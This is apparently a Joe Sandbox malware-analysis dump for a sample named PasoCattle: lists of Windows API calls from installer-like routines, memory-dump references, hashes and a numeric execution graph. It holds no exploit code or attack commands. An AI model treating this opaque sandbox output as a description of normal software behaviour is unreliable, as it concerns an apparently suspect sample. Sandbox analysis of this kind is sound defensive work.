                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2883127279-0
                                                                                                                                                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                      • String ID: !N~
                                                                                                                                                                      • API String ID: 623250636-529124213
                                                                                                                                                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                      Strings
                                                                                                                                                                      • Error launching installer, xrefs: 00405C74
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                      • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                      • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                      • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                      • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                                                                                      • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                      • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                      • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                      • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                      • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2236116775.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000002.00000002.2236097556.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236180393.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000002.00000002.2236370091.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                      • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                      • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                      • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                      • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:3.3%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:3.5%
                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                      Total number of Limit Nodes:58
                                                                                                                                                                      execution_graph 96543 546555 96550 51014b 96543->96550 96545 54655c 96548 546575 __fread_nolock 96545->96548 96559 51017b 96545->96559 96547 51017b 8 API calls 96549 54659a 96547->96549 96548->96547 96551 510150 ___std_exception_copy 96550->96551 96552 51016a 96551->96552 96555 51016c 96551->96555 96568 51521d 7 API calls 2 library calls 96551->96568 96552->96545 96554 5109dd 96570 513614 RaiseException 96554->96570 96555->96554 96569 513614 RaiseException 96555->96569 96557 5109fa 96557->96545 96560 51014b ___std_exception_copy 96559->96560 96561 51016a 96560->96561 96563 51016c 96560->96563 96571 51521d 7 API calls 2 library calls 96560->96571 96561->96548 96567 5109dd 96563->96567 96572 513614 RaiseException 96563->96572 96565 5109fa 96565->96548 96573 513614 RaiseException 96567->96573 96568->96551 96569->96554 96570->96557 96571->96560 96572->96567 96573->96565 96574 545050 96578 561a7f 96574->96578 96576 54505b 96577 561a7f 52 API calls 96576->96577 96577->96576 96579 561a8c 96578->96579 96585 561ab9 96578->96585 96580 561abb 96579->96580 96581 561ac0 96579->96581 96579->96585 96587 561ab3 96579->96587 96622 50fd71 52 API calls 96580->96622 96589 4f8ec0 96581->96589 96585->96576 96621 4fc520 39 API calls 96587->96621 96590 4f8ed5 96589->96590 96591 4f8ed2 96589->96591 96592 4f8edd 96590->96592 96593 4f8f0b 96590->96593 96612 4f7bb5 96591->96612 96623 515536 26 API calls 96592->96623 96595 536b1f 96593->96595 96598 4f8f1d 96593->96598 96603 536a38 96593->96603 96632 5154f3 26 API calls 96595->96632 96596 4f8eed 96602 51014b 8 API calls 96596->96602 96630 50fe6f 51 API calls 96598->96630 96599 536b37 96599->96599 96604 4f8ef7 96602->96604 96606 51017b 8 API calls 96603->96606 96607 536ab1 96603->96607 96624 4fb329 96604->96624 96608 536a81 96606->96608 96631 50fe6f 51 API calls 96607->96631 96609 51014b 8 API calls 96608->96609 96610 536aa8 96609->96610 96611 4fb329 8 API calls 96610->96611 96611->96607 96613 4f7bc7 96612->96613 96614 53641d 96612->96614 96633 4f7bd8 96613->96633 96643 5513c8 8 API calls __fread_nolock 96614->96643 96617 4f7bd3 96617->96585 96618 536433 96619 536427 96619->96618 96644 4fbed9 96619->96644 96621->96585 96622->96581 96623->96596 96625 4fb338 _wcslen 96624->96625 96626 51017b 8 API calls 96625->96626 96627 4fb360 __fread_nolock 96626->96627 96628 51014b 8 API calls 96627->96628 96629 4fb376 96628->96629 96629->96591 96630->96596 96631->96595 96632->96599 96634 4f7c1b __fread_nolock 96633->96634 96635 4f7be7 96633->96635 96634->96617 96635->96634 96636 53644e 96635->96636 96637 4f7c0e 96635->96637 96639 51014b 8 API calls 96636->96639 96648 4f7d74 96637->96648 96640 53645d 96639->96640 96641 51017b 8 API calls 96640->96641 96642 536491 __fread_nolock 96641->96642 96643->96619 96645 4fbefc __fread_nolock 96644->96645 96646 4fbeed 96644->96646 96645->96618 96646->96645 96647 51017b 8 API calls 96646->96647 96647->96645 96650 4f7d8a 96648->96650 96652 4f7d85 __fread_nolock 96648->96652 96649 536528 96650->96649 96651 51017b 8 API calls 96650->96651 96651->96652 96652->96634 96653 545650 96662 50e3d5 96653->96662 96655 545666 96657 5456e1 96655->96657 96671 50aa65 9 API calls 96655->96671 96661 5461d7 96657->96661 96673 563fe1 81 API calls __wsopen_s 96657->96673 96659 5456c1 96659->96657 96672 56247e 8 API calls 96659->96672 96663 50e3e3 96662->96663 96664 50e3f6 96662->96664 96674 4fb4c8 96663->96674 96666 50e429 96664->96666 96667 50e3fb 96664->96667 96668 4fb4c8 8 API calls 96666->96668 96669 51014b 8 API calls 96667->96669 96670 50e3ed 96668->96670 96669->96670 96670->96655 96671->96659 96672->96657 96673->96661 96675 4fb4dc 96674->96675 96676 4fb4d6 96674->96676 96675->96670 96676->96675 96677 4fbed9 8 API calls 96676->96677 96677->96675 96678 52947a 96679 529487 96678->96679 96683 52949f 96678->96683 96735 51f649 20 API calls _abort 96679->96735 96681 52948c 96736 522b5c 26 API calls _abort 96681->96736 96684 5294fa 96683->96684 96692 529497 96683->96692 96737 530144 21 API calls 2 library calls 96683->96737 96698 51dcc5 96684->96698 96687 529512 96705 528fb2 96687->96705 96689 529519 96690 51dcc5 __fread_nolock 26 API calls 96689->96690 96689->96692 96691 529545 96690->96691 96691->96692 96693 51dcc5 __fread_nolock 26 API calls 96691->96693 96694 529553 96693->96694 96694->96692 96695 51dcc5 __fread_nolock 26 API calls 96694->96695 96696 529563 96695->96696 96697 51dcc5 __fread_nolock 26 API calls 96696->96697 96697->96692 96699 51dcd1 96698->96699 96700 51dce6 96698->96700 96738 51f649 20 API calls _abort 96699->96738 96700->96687 96702 51dcd6 96739 522b5c 26 API calls _abort 96702->96739 96704 51dce1 96704->96687 96706 528fbe ___BuildCatchObject 96705->96706 96707 528fc6 96706->96707 96708 528fde 96706->96708 96806 51f636 20 API calls _abort 96707->96806 96710 5290a4 96708->96710 96715 529017 96708->96715 96813 51f636 20 API calls _abort 96710->96813 96712 528fcb 96807 51f649 20 API calls _abort 96712->96807 96713 5290a9 96814 51f649 20 API calls _abort 96713->96814 96716 529026 96715->96716 96717 52903b 96715->96717 96808 51f636 20 API calls _abort 96716->96808 96740 5254ba EnterCriticalSection 96717->96740 96721 529033 96815 522b5c 26 API calls _abort 96721->96815 96722 52902b 96809 51f649 20 API calls _abort 96722->96809 96723 529041 96725 529072 96723->96725 96726 52905d 96723->96726 96741 5290c5 96725->96741 96810 51f649 20 API calls _abort 96726->96810 96728 528fd3 __wsopen_s 96728->96689 96731 529062 96811 51f636 20 API calls _abort 96731->96811 96732 52906d 96812 52909c LeaveCriticalSection __wsopen_s 96732->96812 96735->96681 96736->96692 96737->96684 96738->96702 96739->96704 96740->96723 96742 5290d7 96741->96742 96743 5290ef 96741->96743 96832 51f636 20 API calls _abort 96742->96832 96745 529459 96743->96745 96750 529134 96743->96750 96855 51f636 20 API calls _abort 96745->96855 96746 5290dc 96833 51f649 20 API calls _abort 96746->96833 96749 52945e 96856 51f649 20 API calls _abort 96749->96856 96751 5290e4 96750->96751 96753 52913f 96750->96753 96757 52916f 96750->96757 96751->96732 96834 51f636 20 API calls _abort 96753->96834 96754 52914c 96857 522b5c 26 API calls _abort 96754->96857 96756 529144 96835 51f649 20 API calls _abort 96756->96835 96760 529188 96757->96760 96761 5291ca 96757->96761 96762 5291ae 96757->96762 96760->96762 96796 529195 96760->96796 96816 523b93 96761->96816 96836 51f636 20 API calls _abort 96762->96836 96765 5291b3 96837 51f649 20 API calls _abort 96765->96837 96770 529333 96773 5293a9 96770->96773 96777 52934c GetConsoleMode 96770->96777 96771 5291ba 96838 522b5c 26 API calls _abort 96771->96838 96772 5291ea 96775 522d38 _free 20 API calls 96772->96775 96776 5293ad ReadFile 96773->96776 96778 5291f1 96775->96778 96779 529421 GetLastError 96776->96779 96780 5293c7 96776->96780 96777->96773 96781 52935d 96777->96781 96782 529216 96778->96782 96783 5291fb 96778->96783 96784 529385 96779->96784 96785 52942e 96779->96785 96780->96779 96786 52939e 96780->96786 96781->96776 96787 529363 ReadConsoleW 96781->96787 96847 5297a4 96782->96847 96845 51f649 20 API calls _abort 96783->96845 96803 5291c5 __fread_nolock 96784->96803 96850 51f613 20 API calls __dosmaperr 96784->96850 96853 51f649 20 API calls _abort 96785->96853 96799 529403 96786->96799 96800 5293ec 96786->96800 96786->96803 96787->96786 96788 52937f GetLastError 96787->96788 96788->96784 96789 522d38 _free 20 API calls 96789->96751 96794 529200 96846 51f636 20 API calls _abort 96794->96846 96795 529433 96854 51f636 20 API calls _abort 96795->96854 96823 52fc1b 96796->96823 96802 52941a 96799->96802 96799->96803 96851 528de1 31 API calls 2 library calls 96800->96851 96852 528c21 29 API calls __fread_nolock 96802->96852 96803->96789 96805 52941f 96805->96803 96806->96712 96807->96728 96808->96722 96809->96721 96810->96731 96811->96732 96812->96728 96813->96713 96814->96721 96815->96728 96817 523bd1 96816->96817 96822 523ba1 _abort 96816->96822 96859 51f649 20 API calls _abort 96817->96859 96818 523bbc RtlAllocateHeap 96820 523bcf 96818->96820 96818->96822 96839 522d38 96820->96839 96822->96817 96822->96818 96858 51521d 7 API calls 2 library calls 96822->96858 96824 52fc35 96823->96824 96825 52fc28 96823->96825 96828 52fc41 96824->96828 96861 51f649 20 API calls _abort 96824->96861 96860 51f649 20 API calls _abort 96825->96860 96827 52fc2d 96827->96770 96828->96770 96830 52fc62 96862 522b5c 26 API calls _abort 96830->96862 96832->96746 96833->96751 96834->96756 96835->96754 96836->96765 96837->96771 96838->96803 96840 522d43 RtlFreeHeap 96839->96840 96841 522d6c __dosmaperr 96839->96841 96840->96841 96842 522d58 96840->96842 96841->96772 96863 51f649 20 API calls _abort 96842->96863 96844 522d5e GetLastError 96844->96841 96845->96794 96846->96803 96864 52970b 96847->96864 96850->96803 96851->96803 96852->96805 96853->96795 96854->96803 96855->96749 96856->96754 96857->96751 96858->96822 96859->96820 96860->96827 96861->96830 96862->96827 96863->96844 96873 525737 96864->96873 96866 52971d 96867 529736 SetFilePointerEx 96866->96867 96868 529725 96866->96868 96870 52974e GetLastError 96867->96870 96871 52972a 96867->96871 96886 51f649 20 API calls _abort 96868->96886 96887 51f613 20 API calls __dosmaperr 96870->96887 96871->96796 96874 525744 96873->96874 96875 525759 96873->96875 96888 51f636 20 API calls _abort 96874->96888 96880 52577e 96875->96880 96890 51f636 20 API calls _abort 96875->96890 96877 525749 96889 51f649 20 API calls _abort 96877->96889 96880->96866 96881 525789 96891 51f649 20 API calls _abort 96881->96891 96882 525751 96882->96866 96884 525791 96892 522b5c 26 API calls _abort 96884->96892 96886->96871 96887->96871 96888->96877 96889->96882 96890->96881 96891->96884 96892->96882 96893 4ff5e5 96896 4fcab0 96893->96896 96897 4fcacb 96896->96897 96898 54150c 96897->96898 96899 5414be 96897->96899 96906 4fcaf0 96897->96906 96968 5762ff 207 API calls 2 library calls 96898->96968 96902 5414c8 96899->96902 96905 5414d5 96899->96905 96899->96906 96966 576790 207 API calls 96902->96966 96923 4fcdc0 96905->96923 96967 576c2d 207 API calls 2 library calls 96905->96967 96913 4fcdee 96906->96913 96914 5416e8 96906->96914 96920 4fb4c8 8 API calls 96906->96920 96921 50e807 39 API calls 96906->96921 96922 4fcf80 39 API calls 96906->96922 96906->96923 96925 4fbed9 8 API calls 96906->96925 96927 500340 96906->96927 96950 4fbe2d 96906->96950 96954 50e7c1 39 API calls 96906->96954 96955 50aa99 207 API calls 96906->96955 96956 5105b2 5 API calls __Init_thread_wait 96906->96956 96957 50bc58 96906->96957 96962 510413 29 API calls __onexit 96906->96962 96963 510568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96906->96963 96964 50f4df 81 API calls 96906->96964 96965 50f346 207 API calls 96906->96965 96969 54ffaf 8 API calls 96906->96969 96909 54179f 96909->96909 96970 576669 81 API calls 96914->96970 96920->96906 96921->96906 96922->96906 96923->96913 96971 563fe1 81 API calls __wsopen_s 96923->96971 96925->96906 96945 500376 ISource 96927->96945 96928 510413 29 API calls pre_c_initialization 96928->96945 96929 54632b 97047 563fe1 81 API calls __wsopen_s 96929->97047 96930 501695 96939 4fbed9 8 API calls 96930->96939 96944 50049d ISource 96930->96944 96931 51014b 8 API calls 96931->96945 96934 4fbed9 8 API calls 96934->96945 96935 545cdb 96942 4fbed9 8 API calls 96935->96942 96935->96944 96936 54625a 97046 563fe1 81 API calls __wsopen_s 96936->97046 96939->96944 96940 5105b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96940->96945 96942->96944 96943 4fbf73 8 API calls 96943->96945 96944->96906 96945->96928 96945->96929 96945->96930 96945->96931 96945->96934 96945->96935 96945->96936 96945->96940 